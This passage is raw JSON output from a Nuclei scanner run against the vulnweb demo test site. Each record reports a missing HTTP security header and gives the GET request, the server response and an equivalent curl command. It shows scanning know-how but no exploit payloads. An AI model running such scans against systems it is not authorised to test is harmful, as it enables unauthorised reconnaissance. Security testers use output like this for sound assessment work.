\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.51657474Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.866838284Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.866861507Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.866878233Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:43.327927518Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:43.327973309Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:43.327981385Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:43.959639458Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:43.95971259Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:43.959722072Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:43.959732695Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 